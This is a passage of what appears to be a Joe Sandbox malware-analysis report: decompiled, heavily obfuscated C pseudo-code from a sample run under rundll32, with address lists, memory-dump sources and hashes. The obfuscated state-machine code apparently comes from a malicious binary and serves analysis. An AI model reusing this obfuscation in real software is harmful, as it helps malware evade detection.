                                                                                                                      										_t485 = 0xa1723c1;
                                                                                                                      										L17:
                                                                                                                      										_t400 = _v152;
                                                                                                                      									} else {
                                                                                                                      										_t410 = E0069D25E(_t441);
                                                                                                                      										_t485 = 0x9a40434;
                                                                                                                      										_t400 = _v12 * 0x2c + _t421;
                                                                                                                      										_v152 = _t400;
                                                                                                                      										_t482 =  >=  ? _t421 : (_t410 & 0x0000001f) * 0x2c + _t421;
                                                                                                                      									}
                                                                                                                      									_t434 = _v160;
                                                                                                                      									_t473 = 0x6a50b97;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t485 == _t473) {
                                                                                                                      										E00692007(_v72, _v40, _v140, _t434, _v80,  &_v8, _v156, _t434, _t489, _v20);
                                                                                                                      										_t485 =  !=  ? 0xd1a593f : 0xb29ddc7;
                                                                                                                      										_t400 = E00698F9E(_v32, _v180, _v64, _v28, _v160);
                                                                                                                      										_t491 =  &(_t491[0xb]);
                                                                                                                      										L30:
                                                                                                                      										_t473 = 0x6a50b97;
                                                                                                                      										goto L31;
                                                                                                                      									} else {
                                                                                                                      										if(_t485 == 0x8939926) {
                                                                                                                      											_t485 = 0xe60f9b1;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t485 != 0x9a40434) {
                                                                                                                      												L31:
                                                                                                                      												if(_t485 != 0x88fb243) {
                                                                                                                      													goto L1;
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												_t434 = E006842C4(_v88, _a8, _v48, _v188,  *_t482, _v100, _v148);
                                                                                                                      												_t491 =  &(_t491[5]);
                                                                                                                      												_v160 = _t434;
                                                                                                                      												_t473 = 0x6a50b97;
                                                                                                                      												_t485 =  !=  ? 0x6a50b97 : 0xb29ddc7;
                                                                                                                      												_t400 = _v152;
                                                                                                                      												while(1) {
                                                                                                                      													L3:
                                                                                                                      													_t493 = _t485 - 0xa1723c1;
                                                                                                                      													if(_t493 > 0) {
                                                                                                                      														goto L19;
                                                                                                                      													}
                                                                                                                      													goto L4;
                                                                                                                      												}
                                                                                                                      												goto L19;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L34:
                                                                                                                      							return _t400;
                                                                                                                      							L19:
                                                                                                                      							if(_t485 == 0xaf524c8) {
                                                                                                                      								_push(_t434);
                                                                                                                      								_push(_t434);
                                                                                                                      								_t400 = E00687FF2(0x2000);
                                                                                                                      								_t489 = _t400;
                                                                                                                      								if(_t400 == 0) {
                                                                                                                      									_t485 = 0x4b7559b;
                                                                                                                      									goto L30;
                                                                                                                      								} else {
                                                                                                                      									_t485 = 0x4ed616e;
                                                                                                                      									goto L17;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t485 == 0xb29ddc7) {
                                                                                                                      									_t482 = _t482 + 0x2c;
                                                                                                                      									asm("sbb esi, esi");
                                                                                                                      									_t485 = (_t485 & 0xff8ce073) + 0xa1723c1;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									_t400 = 0xd1a593f;
                                                                                                                      									if(_t485 == 0xd1a593f) {
                                                                                                                      										E0068DF6F(_v120, _v176, _v128, _v16, _v184, _v136, _t489);
                                                                                                                      										_t491 =  &(_t491[5]);
                                                                                                                      										goto L16;
                                                                                                                      									} else {
                                                                                                                      										if(_t485 != 0xe60f9b1) {
                                                                                                                      											goto L31;
                                                                                                                      										} else {
                                                                                                                      											_push(_t434);
                                                                                                                      											_push(_t434);
                                                                                                                      											_t400 = E00687FF2(0x20000);
                                                                                                                      											_t421 = 0xd1a593f;
                                                                                                                      											if(0xd1a593f != 0) {
                                                                                                                      												_t485 = 0xaf524c8;
                                                                                                                      												goto L17;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							goto L34;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}









































































                                                                                                                      0x0068d921
                                                                                                                      0x0068d926
                                                                                                                      0x0068d92e
                                                                                                                      0x0068d936
                                                                                                                      0x0068d93e
                                                                                                                      0x0068d946
                                                                                                                      0x0068d952
                                                                                                                      0x0068d957
                                                                                                                      0x0068d95d
                                                                                                                      0x0068d965
                                                                                                                      0x0068d970
                                                                                                                      0x0068d978
                                                                                                                      0x0068d983
                                                                                                                      0x0068d98e
                                                                                                                      0x0068d999
                                                                                                                      0x0068d9a4
                                                                                                                      0x0068d9b6
                                                                                                                      0x0068d9bb
                                                                                                                      0x0068d9c4
                                                                                                                      0x0068d9cf
                                                                                                                      0x0068d9da
                                                                                                                      0x0068d9e5
                                                                                                                      0x0068d9f0
                                                                                                                      0x0068d9f8
                                                                                                                      0x0068da00
                                                                                                                      0x0068da08
                                                                                                                      0x0068da1a
                                                                                                                      0x0068da1f
                                                                                                                      0x0068da28
                                                                                                                      0x0068da33
                                                                                                                      0x0068da3b
                                                                                                                      0x0068da43
                                                                                                                      0x0068da4b
                                                                                                                      0x0068da53
                                                                                                                      0x0068da5b
                                                                                                                      0x0068da60
                                                                                                                      0x0068da68
                                                                                                                      0x0068da73
                                                                                                                      0x0068da7b
                                                                                                                      0x0068da86
                                                                                                                      0x0068da93
                                                                                                                      0x0068da94
                                                                                                                      0x0068da9e
                                                                                                                      0x0068daa2
                                                                                                                      0x0068daaa
                                                                                                                      0x0068dab5
                                                                                                                      0x0068dabd
                                                                                                                      0x0068dac8
                                                                                                                      0x0068dad0
                                                                                                                      0x0068dada
                                                                                                                      0x0068dadf
                                                                                                                      0x0068dae7
                                                                                                                      0x0068daef
                                                                                                                      0x0068db03
                                                                                                                      0x0068db08
                                                                                                                      0x0068db0f
                                                                                                                      0x0068db16
                                                                                                                      0x0068db21
                                                                                                                      0x0068db2c
                                                                                                                      0x0068db34
                                                                                                                      0x0068db3f
                                                                                                                      0x0068db47
                                                                                                                      0x0068db52
                                                                                                                      0x0068db57
                                                                                                                      0x0068db5b
                                                                                                                      0x0068db63
                                                                                                                      0x0068db6b
                                                                                                                      0x0068db76
                                                                                                                      0x0068db81
                                                                                                                      0x0068db8c
                                                                                                                      0x0068db97
                                                                                                                      0x0068db9f
                                                                                                                      0x0068dbaa
                                                                                                                      0x0068dbb2
                                                                                                                      0x0068dbb7
                                                                                                                      0x0068dbbc
                                                                                                                      0x0068dbc4
                                                                                                                      0x0068dbcc
                                                                                                                      0x0068dbd4
                                                                                                                      0x0068dbdc
                                                                                                                      0x0068dbe4
                                                                                                                      0x0068dbec
                                                                                                                      0x0068dbf4
                                                                                                                      0x0068dbf9
                                                                                                                      0x0068dbfe
                                                                                                                      0x0068dc02
                                                                                                                      0x0068dc0a
                                                                                                                      0x0068dc12
                                                                                                                      0x0068dc1a
                                                                                                                      0x0068dc22
                                                                                                                      0x0068dc2a
                                                                                                                      0x0068dc32
                                                                                                                      0x0068dc3a
                                                                                                                      0x0068dc42
                                                                                                                      0x0068dc4a
                                                                                                                      0x0068dc52
                                                                                                                      0x0068dc5a
                                                                                                                      0x0068dc65
                                                                                                                      0x0068dc70
                                                                                                                      0x0068dc7b
                                                                                                                      0x0068dc89
                                                                                                                      0x0068dc91
                                                                                                                      0x0068dc95
                                                                                                                      0x0068dc9a
                                                                                                                      0x0068dca2
                                                                                                                      0x0068dca2
                                                                                                                      0x0068dca2
                                                                                                                      0x0068dca6
                                                                                                                      0x0068dca6
                                                                                                                      0x0068dcaa
                                                                                                                      0x0068dcaa
                                                                                                                      0x0068dcaa
                                                                                                                      0x0068dcb0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068dcb6
                                                                                                                      0x0068dcb6
                                                                                                                      0x0068de66
                                                                                                                      0x0068de6c
                                                                                                                      0x00000000
                                                                                                                      0x0068dcbc
                                                                                                                      0x0068dcc2
                                                                                                                      0x00000000
                                                                                                                      0x0068df63
                                                                                                                      0x0068dcce
                                                                                                                      0x0068de01
                                                                                                                      0x0068de05
                                                                                                                      0x0068de0a
                                                                                                                      0x0068de0f
                                                                                                                      0x0068de52
                                                                                                                      0x0068de52
                                                                                                                      0x0068de57
                                                                                                                      0x0068de57
                                                                                                                      0x0068de11
                                                                                                                      0x0068de1f
                                                                                                                      0x0068de27
                                                                                                                      0x0068de39
                                                                                                                      0x0068de3d
                                                                                                                      0x0068de41
                                                                                                                      0x0068de41
                                                                                                                      0x0068de44
                                                                                                                      0x0068de48
                                                                                                                      0x00000000
                                                                                                                      0x0068dcd4
                                                                                                                      0x0068dcd6
                                                                                                                      0x0068dd6a
                                                                                                                      0x0068dd91
                                                                                                                      0x0068dd9b
                                                                                                                      0x0068dda0
                                                                                                                      0x0068df40
                                                                                                                      0x0068df40
                                                                                                                      0x00000000
                                                                                                                      0x0068dcd8
                                                                                                                      0x0068dcde
                                                                                                                      0x0068dd31
                                                                                                                      0x00000000
                                                                                                                      0x0068dce0
                                                                                                                      0x0068dce6
                                                                                                                      0x0068df45
                                                                                                                      0x0068df4b
                                                                                                                      0x00000000
                                                                                                                      0x0068df4d
                                                                                                                      0x0068dcec
                                                                                                                      0x0068dd14
                                                                                                                      0x0068dd16
                                                                                                                      0x0068dd1b
                                                                                                                      0x0068dd24
                                                                                                                      0x0068dd29
                                                                                                                      0x0068dca6
                                                                                                                      0x0068dcaa
                                                                                                                      0x0068dcaa
                                                                                                                      0x0068dcaa
                                                                                                                      0x0068dcb0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068dcb0
                                                                                                                      0x00000000
                                                                                                                      0x0068dcaa
                                                                                                                      0x0068dce6
                                                                                                                      0x0068dcde
                                                                                                                      0x0068dcd6
                                                                                                                      0x0068dcce
                                                                                                                      0x0068df6e
                                                                                                                      0x0068df6e
                                                                                                                      0x0068de73
                                                                                                                      0x0068de79
                                                                                                                      0x0068df22
                                                                                                                      0x0068df23
                                                                                                                      0x0068df24
                                                                                                                      0x0068df29
                                                                                                                      0x0068df2f
                                                                                                                      0x0068df3b
                                                                                                                      0x00000000
                                                                                                                      0x0068df31
                                                                                                                      0x0068df31
                                                                                                                      0x00000000
                                                                                                                      0x0068df31
                                                                                                                      0x0068de7f
                                                                                                                      0x0068de85
                                                                                                                      0x0068def6
                                                                                                                      0x0068defb
                                                                                                                      0x0068df03
                                                                                                                      0x00000000
                                                                                                                      0x0068de87
                                                                                                                      0x0068de87
                                                                                                                      0x0068de8e
                                                                                                                      0x0068dee9
                                                                                                                      0x0068deee
                                                                                                                      0x00000000
                                                                                                                      0x0068de90
                                                                                                                      0x0068de96
                                                                                                                      0x00000000
                                                                                                                      0x0068de9c
                                                                                                                      0x0068deb3
                                                                                                                      0x0068deb4
                                                                                                                      0x0068deb5
                                                                                                                      0x0068deba
                                                                                                                      0x0068dec0
                                                                                                                      0x0068dec6
                                                                                                                      0x00000000
                                                                                                                      0x0068dec6
                                                                                                                      0x0068dec0
                                                                                                                      0x0068de96
                                                                                                                      0x0068de8e
                                                                                                                      0x0068de85
                                                                                                                      0x00000000
                                                                                                                      0x0068de79
                                                                                                                      0x0068dcaa
                                                                                                                      0x0068dca6

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6#d$6>V$7R$C%$Ed;$nq$udo
                                                                                                                      • API String ID: 0-652707834
                                                                                                                      • Opcode ID: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                      • Instruction ID: 48ec8ed70b47df77f24beb19bc3f917d992fed2e1222469e1836eeaff11ce94c
                                                                                                                      • Opcode Fuzzy Hash: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                      • Instruction Fuzzy Hash: 8B12337250C3809FD368DF25C48AA9FBBE2BBC4344F108A1DE5C986260D7B18949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 98%
                                                                                                                      			E006881B7() {
                                                                                                                      				void* _t347;
                                                                                                                      				signed int _t350;
                                                                                                                      				signed int _t351;
                                                                                                                      				signed int _t353;
                                                                                                                      				signed int _t355;
                                                                                                                      				signed int _t360;
                                                                                                                      				signed int _t364;
                                                                                                                      				void* _t374;
                                                                                                                      				intOrPtr _t407;
                                                                                                                      				signed int _t411;
                                                                                                                      				signed int _t414;
                                                                                                                      				signed int _t415;
                                                                                                                      				signed int _t416;
                                                                                                                      				signed int _t417;
                                                                                                                      				signed int _t418;
                                                                                                                      				signed int _t419;
                                                                                                                      				signed int _t420;
                                                                                                                      				signed int* _t422;
                                                                                                                      				void* _t426;
                                                                                                                      
                                                                                                                      				 *(_t426 + 0x74) = 0xd212a7;
                                                                                                                      				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x52eac678;
                                                                                                                      				_t374 = 0xebf23c2;
                                                                                                                      				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x5238d4de;
                                                                                                                      				 *(_t426 + 0x20) = 0x60274e;
                                                                                                                      				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
                                                                                                                      				_t414 = 0x29;
                                                                                                                      				 *(_t426 + 0x34) =  *(_t426 + 0x20) / _t414;
                                                                                                                      				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0x7a4c;
                                                                                                                      				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0x00009fd0;
                                                                                                                      				 *(_t426 + 0x9c) = 0x5f71eb;
                                                                                                                      				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x01156387;
                                                                                                                      				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x014a126f;
                                                                                                                      				 *(_t426 + 0x1c) = 0x8735e4;
                                                                                                                      				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 0xe;
                                                                                                                      				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 3;
                                                                                                                      				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 4;
                                                                                                                      				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x000153b5;
                                                                                                                      				 *(_t426 + 0x58) = 0x9ed5c5;
                                                                                                                      				_t415 = 0x17;
                                                                                                                      				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) & 0x00000000;
                                                                                                                      				 *(_t426 + 0x54) =  *(_t426 + 0x58) * 0x5d;
                                                                                                                      				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0xb1e1bce9;
                                                                                                                      				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x88583d56;
                                                                                                                      				 *(_t426 + 0x5c) = 0x8fe0dc;
                                                                                                                      				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0xffff3edc;
                                                                                                                      				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t415;
                                                                                                                      				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x00095c01;
                                                                                                                      				 *(_t426 + 0x48) = 0x18253c;
                                                                                                                      				 *(_t426 + 0x48) =  *(_t426 + 0x48) + 0xf9f1;
                                                                                                                      				 *(_t426 + 0x48) =  *(_t426 + 0x48) << 7;
                                                                                                                      				 *(_t426 + 0x48) =  *(_t426 + 0x48) ^ 0x0c842cab;
                                                                                                                      				 *(_t426 + 0x94) = 0x40d4a3;
                                                                                                                      				 *(_t426 + 0x94) =  *(_t426 + 0x94) << 5;
                                                                                                                      				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x081e10bd;
                                                                                                                      				 *(_t426 + 0x20) = 0x8fc5ff;
                                                                                                                      				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
                                                                                                                      				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0x245daa70;
                                                                                                                      				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xfc587561;
                                                                                                                      				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xd80c07a2;
                                                                                                                      				 *(_t426 + 0x38) = 0x52431;
                                                                                                                      				 *(_t426 + 0x38) =  *(_t426 + 0x38) * 0x31;
                                                                                                                      				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa9954a0;
                                                                                                                      				 *(_t426 + 0x38) =  *(_t426 + 0x38) + 0xffff6dd1;
                                                                                                                      				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa6f2662;
                                                                                                                      				 *(_t426 + 0x44) = 0xc4652;
                                                                                                                      				 *(_t426 + 0x44) =  *(_t426 + 0x44) + 0xffff61fe;
                                                                                                                      				 *(_t426 + 0x44) =  *(_t426 + 0x44) >> 4;
                                                                                                                      				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x0000c191;
                                                                                                                      				 *(_t426 + 0x10) = 0x2c06e;
                                                                                                                      				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xffffb3fc;
                                                                                                                      				 *(_t426 + 0x10) =  *(_t426 + 0x10) * 0x27;
                                                                                                                      				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xbfb5;
                                                                                                                      				 *(_t426 + 0x10) =  *(_t426 + 0x10) ^ 0x00679be9;
                                                                                                                      				 *(_t426 + 0x7c) = 0xc3ec9d;
                                                                                                                      				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) << 7;
                                                                                                                      				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) ^ 0x61f5edc1;
                                                                                                                      				 *(_t426 + 0x70) = 0x3416d6;
                                                                                                                      				 *(_t426 + 0x70) =  *(_t426 + 0x70) << 3;
                                                                                                                      				 *(_t426 + 0x70) =  *(_t426 + 0x70) ^ 0x01aaf790;
                                                                                                                      				 *(_t426 + 0x64) = 0x1e8df6;
                                                                                                                      				 *(_t426 + 0x64) =  *(_t426 + 0x64) | 0x232ea122;
                                                                                                                      				 *(_t426 + 0x64) =  *(_t426 + 0x64) * 0x6c;
                                                                                                                      				 *(_t426 + 0x64) =  *(_t426 + 0x64) ^ 0xde707d95;
                                                                                                                      				 *(_t426 + 0x28) = 0xebc79e;
                                                                                                                      				 *(_t426 + 0x28) =  *(_t426 + 0x28) | 0xfe2cd41a;
                                                                                                                      				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xffff955f;
                                                                                                                      				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xf79a;
                                                                                                                      				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xfef90bb7;
                                                                                                                      				 *(_t426 + 0x4c) = 0x6795aa;
                                                                                                                      				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) >> 5;
                                                                                                                      				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) + 0xffffddd4;
                                                                                                                      				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) ^ 0x0005ee09;
                                                                                                                      				 *(_t426 + 0x50) = 0xbc4be8;
                                                                                                                      				 *(_t426 + 0x50) =  *(_t426 + 0x50) ^ 0xc40dbfb1;
                                                                                                                      				_t416 = 0x6f;
                                                                                                                      				 *(_t426 + 0x54) =  *(_t426 + 0x50) * 0x3a;
                                                                                                                      				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x9054da47;
                                                                                                                      				 *(_t426 + 0x94) = 0xde468f;
                                                                                                                      				 *(_t426 + 0x94) =  *(_t426 + 0x94) + 0xffff1011;
                                                                                                                      				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x00dd868e;
                                                                                                                      				 *(_t426 + 0x18) = 0x6e4fa6;
                                                                                                                      				 *(_t426 + 0x18) =  *(_t426 + 0x18) >> 8;
                                                                                                                      				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x937c1de8;
                                                                                                                      				 *(_t426 + 0x18) =  *(_t426 + 0x18) | 0x0d58262f;
                                                                                                                      				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x9f7b4471;
                                                                                                                      				 *(_t426 + 0x5c) = 0xc77145;
                                                                                                                      				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0x9c58;
                                                                                                                      				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t416;
                                                                                                                      				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x0006cc79;
                                                                                                                      				 *(_t426 + 0x44) = 0x492c53;
                                                                                                                      				 *(_t426 + 0x44) =  *(_t426 + 0x44) | 0x932025a2;
                                                                                                                      				 *(_t426 + 0x44) =  *(_t426 + 0x44) << 0xb;
                                                                                                                      				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x496991d6;
                                                                                                                      				 *(_t426 + 0xa0) = 0x27589;
                                                                                                                      				_t417 = 0x3e;
                                                                                                                      				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) * 0x6d;
                                                                                                                      				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) ^ 0x010c563c;
                                                                                                                      				 *(_t426 + 0x30) = 0xb4bbc8;
                                                                                                                      				 *(_t426 + 0x30) =  *(_t426 + 0x30) / _t417;
                                                                                                                      				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0xffff42d9;
                                                                                                                      				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0x5120;
                                                                                                                      				 *(_t426 + 0x30) =  *(_t426 + 0x30) ^ 0x000b6c85;
                                                                                                                      				 *(_t426 + 0x28) = 0xdf5b34;
                                                                                                                      				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xb2734269;
                                                                                                                      				_t418 = 0x5e;
                                                                                                                      				 *(_t426 + 0x28) =  *(_t426 + 0x28) / _t418;
                                                                                                                      				 *(_t426 + 0x28) =  *(_t426 + 0x28) << 6;
                                                                                                                      				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0x79ab34c2;
                                                                                                                      				 *(_t426 + 0x90) = 0xff684d;
                                                                                                                      				 *(_t426 + 0x90) =  *(_t426 + 0x90) | 0x9d6c2ae6;
                                                                                                                      				 *(_t426 + 0x90) =  *(_t426 + 0x90) ^ 0x9df0e455;
                                                                                                                      				 *(_t426 + 0x20) = 0x90e304;
                                                                                                                      				_t419 = 0x7f;
                                                                                                                      				 *(_t426 + 0x1c) =  *(_t426 + 0x20) / _t419;
                                                                                                                      				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 6;
                                                                                                                      				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 0x10;
                                                                                                                      				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x0384731e;
                                                                                                                      				 *(_t426 + 0x60) = 0xa4eb1a;
                                                                                                                      				 *(_t426 + 0x60) =  *(_t426 + 0x60) << 0xc;
                                                                                                                      				 *(_t426 + 0x60) =  *(_t426 + 0x60) * 0x76;
                                                                                                                      				 *(_t426 + 0x60) =  *(_t426 + 0x60) ^ 0x45d23c3b;
                                                                                                                      				 *(_t426 + 0x34) = 0xdaab0d;
                                                                                                                      				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 0xb;
                                                                                                                      				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0xdf07;
                                                                                                                      				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 3;
                                                                                                                      				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0xaac3765a;
                                                                                                                      				 *(_t426 + 0x68) = 0xbbaf5f;
                                                                                                                      				 *(_t426 + 0x68) =  *(_t426 + 0x68) >> 3;
                                                                                                                      				_t372 =  *(_t426 + 0x6c);
                                                                                                                      				_t411 =  *(_t426 + 0x6c);
                                                                                                                      				_t424 =  *(_t426 + 0x6c);
                                                                                                                      				_t420 =  *(_t426 + 0x6c);
                                                                                                                      				 *(_t426 + 0x68) =  *(_t426 + 0x68) * 0x7d;
                                                                                                                      				 *(_t426 + 0x68) =  *(_t426 + 0x68) ^ 0x0b7165e1;
                                                                                                                      				 *(_t426 + 0x74) = 0xfd4b1c;
                                                                                                                      				 *(_t426 + 0x74) =  *(_t426 + 0x74) + 0x7fb7;
                                                                                                                      				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x00f7158e;
                                                                                                                      				 *(_t426 + 0x88) = 0xbb9d8e;
                                                                                                                      				 *(_t426 + 0x88) =  *(_t426 + 0x88) * 0x48;
                                                                                                                      				 *(_t426 + 0x88) =  *(_t426 + 0x88) ^ 0x34cbdce1;
                                                                                                                      				 *(_t426 + 0x3c) = 0x9303e6;
                                                                                                                      				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) << 0xf;
                                                                                                                      				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xad47a309;
                                                                                                                      				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) * 0x3d;
                                                                                                                      				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xa7019983;
                                                                                                                      				 *(_t426 + 0x80) = 0xaf4918;
                                                                                                                      				 *(_t426 + 0x80) =  *(_t426 + 0x80) + 0x655a;
                                                                                                                      				 *(_t426 + 0x80) =  *(_t426 + 0x80) ^ 0x00a67f7b;
                                                                                                                      				 *(_t426 + 0x78) = 0xd8d1b1;
                                                                                                                      				 *(_t426 + 0x78) =  *(_t426 + 0x78) * 0x42;
                                                                                                                      				 *(_t426 + 0x78) =  *(_t426 + 0x78) ^ 0x37ebe9ce;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t347 = 0xfb52c5;
                                                                                                                      					L2:
                                                                                                                      					while(_t374 != 0xd963e9) {
                                                                                                                      						if(_t374 == _t347) {
                                                                                                                      							_t350 = E0069C264( *((intOrPtr*)(_t426 + 0xbc)), _t372,  *(_t426 + 0x3c), _t426 + 0xac,  *((intOrPtr*)(_t426 + 0xa4)), _t374, _t374, _t420,  *(_t426 + 0x68), _t374,  *(_t426 + 0x48),  *(_t426 + 0xa0), _t411);
                                                                                                                      							_t426 = _t426 + 0x2c;
                                                                                                                      							__eflags = _t350;
                                                                                                                      							if(_t350 == 0) {
                                                                                                                      								_t351 =  *(_t426 + 0xa0);
                                                                                                                      							} else {
                                                                                                                      								_t422 = _t411;
                                                                                                                      								while(1) {
                                                                                                                      									__eflags = _t422[1] - 4;
                                                                                                                      									if(_t422[1] != 4) {
                                                                                                                      										goto L20;
                                                                                                                      									}
                                                                                                                      									L19:
                                                                                                                      									_t355 = E0068B23C( *(_t426 + 0x38),  *(_t426 + 0x30), _t424,  *(_t426 + 0x94),  *(_t426 + 0x20),  &(_t422[3]));
                                                                                                                      									_t426 = _t426 + 0x10;
                                                                                                                      									__eflags = _t355;
                                                                                                                      									if(_t355 == 0) {
                                                                                                                      										_t351 = 1;
                                                                                                                      										 *(_t426 + 0xa0) = 1;
                                                                                                                      									} else {
                                                                                                                      										goto L20;
                                                                                                                      									}
                                                                                                                      									L25:
                                                                                                                      									_t420 =  *(_t426 + 0x6c);
                                                                                                                      									goto L26;
                                                                                                                      									L20:
                                                                                                                      									_t353 =  *_t422;
                                                                                                                      									__eflags = _t353;
                                                                                                                      									if(_t353 == 0) {
                                                                                                                      										_t351 =  *(_t426 + 0xa0);
                                                                                                                      									} else {
                                                                                                                      										_t422 = _t422 + _t353;
                                                                                                                      										__eflags = _t422[1] - 4;
                                                                                                                      										if(_t422[1] != 4) {
                                                                                                                      											goto L20;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      									goto L25;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L26:
                                                                                                                      							__eflags = _t351;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_t347 = 0xfb52c5;
                                                                                                                      								_t374 = 0xfb52c5;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								_t407 =  *0x6a3e0c; // 0x0
                                                                                                                      								E0069458F( *(_t426 + 0x64),  *((intOrPtr*)(_t407 + 8)),  *(_t426 + 0x34));
                                                                                                                      								_t374 = 0xd963e9;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							L32:
                                                                                                                      						} else {
                                                                                                                      							if(_t374 == 0x247652d) {
                                                                                                                      								_t360 = E00688F65( *(_t426 + 0x68),  *(_t426 + 0x34), _t426 + 0xb4,  *(_t426 + 0x9c), 0x2000000, _t374, 1,  *(_t426 + 0x80),  *((intOrPtr*)(_t426 + 0xa4)),  *(_t426 + 0x6c), _t374,  *(_t426 + 0x30) | 0x00000006);
                                                                                                                      								_t372 = _t360;
                                                                                                                      								_t426 = _t426 + 0x28;
                                                                                                                      								__eflags = _t360 - 0xffffffff;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t374 = 0x7db0050;
                                                                                                                      									while(1) {
                                                                                                                      										L1:
                                                                                                                      										_t347 = 0xfb52c5;
                                                                                                                      										goto L2;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t374 == 0x4334ccc) {
                                                                                                                      									E0069DA22( *(_t426 + 0x28),  *(_t426 + 0x64), __eflags,  *(_t426 + 0x68), _t426 + 0xac, _t374,  *(_t426 + 0x48));
                                                                                                                      									_t364 = E0068B6CF(_t426 + 0xbc,  *((intOrPtr*)(_t426 + 0xac)),  *(_t426 + 0x34),  *(_t426 + 0x48));
                                                                                                                      									_t424 = _t364;
